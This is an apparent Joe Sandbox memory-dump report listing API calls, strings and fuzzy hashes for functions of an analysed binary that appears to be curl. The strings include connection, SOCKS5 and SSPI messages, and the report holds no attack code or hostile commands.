                                        • Part of subcall function 00007FF7F8D23740: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23768
                                        • Part of subcall function 00007FF7F8D23740: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2377B
                                        • Part of subcall function 00007FF7F8D23740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23788
                                        • Part of subcall function 00007FF7F8D23740: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D237E4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13B27
                                        • Part of subcall function 00007FF7F8D1C3A4: _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D1C43C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$CriticalSection$CloseEnterHandleLeave_time64
                                      • String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one.
                                      • API String ID: 3574907540-2728177351
                                      • Opcode ID: 8459f8bdd80c0128f4a8f39e1386a372b4817de9c99e3599d512dd8fc62300ee
                                      • Instruction ID: 4211626bc8ee178cf1e3fc82702fd9647b52ac0c31b327c932be3ebd332e860a
                                      • Opcode Fuzzy Hash: 8459f8bdd80c0128f4a8f39e1386a372b4817de9c99e3599d512dd8fc62300ee
                                      • Instruction Fuzzy Hash: C271A86170CE8681FB68FB36A41027AE395FF48B94F850035DE6D076D1DE3CE449A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc$calloc
                                      • String ID:
                                      • API String ID: 2045585806-0
                                      • Opcode ID: 3c247b900fb9c98e2c52c074d7f9357099afbbf6cc27a6f2014ee928ac9db7de
                                      • Instruction ID: 251a908cc72d48d172d1e48bdd643f9bb33f8a57be7a3099ffd67dd52ddaa713
                                      • Opcode Fuzzy Hash: 3c247b900fb9c98e2c52c074d7f9357099afbbf6cc27a6f2014ee928ac9db7de
                                      • Instruction Fuzzy Hash: 31310C21A09F8692E718AB21F954368E364FF4DB90F880131DB6E477D1DF3CE4689798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D16C51
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
                                        • Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
                                        • Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
                                        • Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
                                        • Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1
                                      • recv.WS2_32 ref: 00007FF7F8D16C81
                                      • WSAGetLastError.WS2_32 ref: 00007FF7F8D16C98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_errno$__sys_nerrfreerecvstrerrorstrncpy
                                      • String ID: Recv failure: %s
                                      • API String ID: 3745912867-4276829032
                                      • Opcode ID: cf785ebd3ff7ac6113d79ace72327a67e34ac1fc09e82a8d285f2af87dddee72
                                      • Instruction ID: be353a147b6753c7a8b08e237bb83b6f51ae1562bb77dfab33291d05d9a8fbe6
                                      • Opcode Fuzzy Hash: cf785ebd3ff7ac6113d79ace72327a67e34ac1fc09e82a8d285f2af87dddee72
                                      • Instruction Fuzzy Hash: 15318B32A09B4582EB00AB66E944368E7A1FF58FE0F948531DF2D07BC4CF78E0659384
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: PathSearch_strdupfree
                                      • String ID: curl-ca-bundle.crt
                                      • API String ID: 3871617166-694051528
                                      • Opcode ID: 80257d106268b7156702b807795f7bfdef38116b574733f601bbedbebd137cdd
                                      • Instruction ID: d6b00b6a01f9ab75290fddd15f8e78e878e19ac71c08b68390a93e8426d61e84
                                      • Opcode Fuzzy Hash: 80257d106268b7156702b807795f7bfdef38116b574733f601bbedbebd137cdd
                                      • Instruction Fuzzy Hash: CA114932308B8582EB159B64F8853AAF3A0FB8D784F840139DB9C43794DF3CD1588B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                      • API String ID: 190572456-3788156360
                                      • Opcode ID: 7a845b0dfd0f9790d6f35a26b160d084eb3f47bb28ba0316c029875815e7de1b
                                      • Instruction ID: 14d758e92c82ce4a47d60e21731fc575d3ab2643f35891e9a96262cd5030ccc2
                                      • Opcode Fuzzy Hash: 7a845b0dfd0f9790d6f35a26b160d084eb3f47bb28ba0316c029875815e7de1b
                                      • Instruction Fuzzy Hash: 790116A0A0AA4690FF15BB34B814275E391AF1C724FC80139C82D462D5EF3CA55DE6B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: Count64ErrorLastSleepTick
                                      • String ID: xX
                                      • API String ID: 1418292552-1718075044
                                      • Opcode ID: 47cf11ce024fa1af2c8d60a81bf607da254bceded1632ad1003256207bf5c478
                                      • Instruction ID: 2c413bad8acba2b75af9b4067b61264881e591758ae9e5d26049353d9fc99404
                                      • Opcode Fuzzy Hash: 47cf11ce024fa1af2c8d60a81bf607da254bceded1632ad1003256207bf5c478
                                      • Instruction Fuzzy Hash: D331EA22E0C60687FB55EB69D0502BCE261EF49350FA40135DE3E566C9DF3CE849D3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D01BD0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C0A
                                        • Part of subcall function 00007FF7F8D01BD0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C18
                                        • Part of subcall function 00007FF7F8D01BD0: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D01C23
                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01D58
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01D91
                                      Strings
                                      • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00007FF7F8D01D33
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fclosefflushfopenfwritestrerror
                                      • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                      • API String ID: 4220792569-3734715646
                                      • Opcode ID: 39f5190e9b3c3a537bbde24749fb3a218a5e4388b8167e9e8207b6ef2417985a
                                      • Instruction ID: 5babce49df948b2e02631fc75bf4fa74ba5f29e89411852a2b1ee629c4af79f2
                                      • Opcode Fuzzy Hash: 39f5190e9b3c3a537bbde24749fb3a218a5e4388b8167e9e8207b6ef2417985a
                                      • Instruction Fuzzy Hash: 3831C411A0DA9546EF11EB22A400369E7A4FF5CFC4F884031DE6C0B799DF38E049A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLastSleepgetsockopt
                                      • String ID:
                                      • API String ID: 3033474312-0
                                      • Opcode ID: 309a4c7660c9b131638026dff342b7747f44afaed63c76043abdc281d7bcf4d8
                                      • Instruction ID: c1546b90325c8924f6c48988725a089e15fc03e8390df54b57dba11b6ba90ed1
                                      • Opcode Fuzzy Hash: 309a4c7660c9b131638026dff342b7747f44afaed63c76043abdc281d7bcf4d8
                                      • Instruction Fuzzy Hash: 5E01D43260C94283F710AB20E44423AE3A0EF4C7A4F684030DAAD43AE8DF3DD45CDB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64
                                      • String ID: Closing connection %ld
                                      • API String ID: 1670930206-2599090834
                                      • Opcode ID: 5114cfb86861e21925603e0c8123021072bcdb675a0fd7059cf460fb5df34bc6
                                      • Instruction ID: 60661b4a6b162081100a9229b595eb134ca613f79b8f17b17c80c0501f7ce322
                                      • Opcode Fuzzy Hash: 5114cfb86861e21925603e0c8123021072bcdb675a0fd7059cf460fb5df34bc6
                                      • Instruction Fuzzy Hash: FB517E62A0CA8281FB54EB35D0543B9E361EF48BE4F984031DA2D076D5CF2CE459D7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: User-Agent: %s
                                      • API String ID: 1294909896-43864714
                                      • Opcode ID: e1989e59a761badc1575e18e96f193f661b9bc852c2d6fad09cf12f4abae1ba9
                                      • Instruction ID: 6d1d00d330c64ecca90369fcc67d242ea23695dd3a9b6955442d056b5518c3c2
                                      • Opcode Fuzzy Hash: e1989e59a761badc1575e18e96f193f661b9bc852c2d6fad09cf12f4abae1ba9
                                      • Instruction Fuzzy Hash: 51318F22A08AC181EB58EB24D5403BAE750EF59780F944130DBB9076D2CF7CE5A9D794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: CleanupStartup
                                      • String ID:
                                      • API String ID: 915672949-0
                                      • Opcode ID: 0bf2d28154097ae3a4a02d73aa9df8a4ce6cd191b29eb8c49c53fac61c2a0ab7
                                      • Instruction ID: 0c9f5f0ccd98e2753c90c73073b0306d21c7efd1dbc62e1e24614f6b4ce3032f
                                      • Opcode Fuzzy Hash: 0bf2d28154097ae3a4a02d73aa9df8a4ce6cd191b29eb8c49c53fac61c2a0ab7
                                      • Instruction Fuzzy Hash: D3311820E0DA4785F760B724B895379E3A4AF1C350FD40035D87D822E6EE2CA44DABF9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: EnvironmentExpandStringsgetenv
                                      • String ID:
                                      • API String ID: 4247756900-0
                                      • Opcode ID: 8eaebc280501399d5d48418efa029988173f73c31852bf2ee3c03732f1254eae
                                      • Instruction ID: edfed837471a0e6c492de9ffb252e97b31f0551f5cfbc3c3d7562746123251da
                                      • Opcode Fuzzy Hash: 8eaebc280501399d5d48418efa029988173f73c31852bf2ee3c03732f1254eae
                                      • Instruction Fuzzy Hash: DAF04461A1DA8681FF21AB62F4A4365E390BF5C744FC80134DA9D4B794DE3CD14CDB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: closesocketsocket
                                      • String ID:
                                      • API String ID: 2760038618-0
                                      • Opcode ID: a8e31ec4c6812d45385db6aecce42880c007cf63c768b4c654c65886e565fac6
                                      • Instruction ID: da213ca6940c0a8a9c23fee14a0a50739095db9366595061058b07ab8794088d
                                      • Opcode Fuzzy Hash: a8e31ec4c6812d45385db6aecce42880c007cf63c768b4c654c65886e565fac6
                                      • Instruction Fuzzy Hash: 86F0F830A0D5168AE740AB24E840A24F291BF59730F904730E43E822E0DB2C644CABE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 70b9ead84d4ecb747685cd7c24f3ca89e7f85b9d018000f0ebea4e8804b4b7f5
                                      • Instruction ID: c61f832c4f4960ad7100d1344492f2eadd651107caa0d950a5dd6c52c0dc14c7
                                      • Opcode Fuzzy Hash: 70b9ead84d4ecb747685cd7c24f3ca89e7f85b9d018000f0ebea4e8804b4b7f5
                                      • Instruction Fuzzy Hash: 12619122A08A8681FB55EB7694407B9E3A0BF8DBA8F844135DE7E177D1DE2DD0089394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: callocfreemalloc
                                      • String ID:
                                      • API String ID: 4086611775-0
                                      • Opcode ID: 117018191ef2ce2d22307311a6c13794b0e4a6b55e4dcb7a3991b81abc3f5fa5
                                      • Instruction ID: d4901685b3c2beab10959a959606f65bce632628b8faf5785b066f1e7d5e7924
                                      • Opcode Fuzzy Hash: 117018191ef2ce2d22307311a6c13794b0e4a6b55e4dcb7a3991b81abc3f5fa5
                                      • Instruction Fuzzy Hash: 96514931608B42A6FB18EF21E9506A9F3A4FF48754FC40135DA6D43A91EF3CE129D398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID:
                                      • API String ID: 98920635-0
                                      • Opcode ID: 7d5f5f8771239477de206143faa03e9e2d6f8fe07989bb391a30102118ef228f
                                      • Instruction ID: 954ba2846d312585b9b5ebb4af7055c779aaa8233b0583e757b0b158af770697
                                      • Opcode Fuzzy Hash: 7d5f5f8771239477de206143faa03e9e2d6f8fe07989bb391a30102118ef228f
                                      • Instruction Fuzzy Hash: 0D215CB3B05A80CAE750DF25E444B69B3A1FB88BA4F488235DE6987394DF38D845CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 39586083f6ca1d1da527e7123ee2ba1e90cacf6a77714cfa57fd025c5b48c215
                                      • Instruction ID: 1b629cbf9823dfb76dd07de365c322f7e1dbfcea1bf5eeb292721293545bf375
                                      • Opcode Fuzzy Hash: 39586083f6ca1d1da527e7123ee2ba1e90cacf6a77714cfa57fd025c5b48c215
                                      • Instruction Fuzzy Hash: 3DF06D15B0EE8281FB54FB75A40407DE3A1EF4CBA0F884431EA2D47B95DE2CD49AD758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc$free$htons$__swprintf_lstrchr
                                      • String ID: GSS-API confidentiality$ GSS-API integrity$%s/%s$AcquireCredentialsHandle$DecryptMessage$EncryptMessage$Failed to acquire credentials.$Failed to determine user name.$Failed to initialise security context.$Failed to query security context attributes.$Failed to receive SSPI authentication response.$Failed to receive SSPI authentication token.$Failed to receive SSPI encryption response.$Failed to receive SSPI encryption type.$Failed to send SSPI authentication request.$Failed to send SSPI authentication token.$Failed to send SSPI encryption request.$Failed to send SSPI encryption type.$InitializeSecurityContext$Invalid SSPI authentication response type (%u %u).$Invalid SSPI encryption response length (%lu).$Invalid SSPI encryption response type (%u %u).$Kerberos$QueryContextAttributes$QueryCredentialAttributes$SOCKS5 access with%s protection granted.$SOCKS5 server authencticated user %s with GSS-API.$SOCKS5 server supports GSS-API %s data protection.$User was rejected by the SOCKS5 server (%u %u).$confidentiality$integrity$out GSS-API data$rcmd
                                      • API String ID: 2697823286-334495253
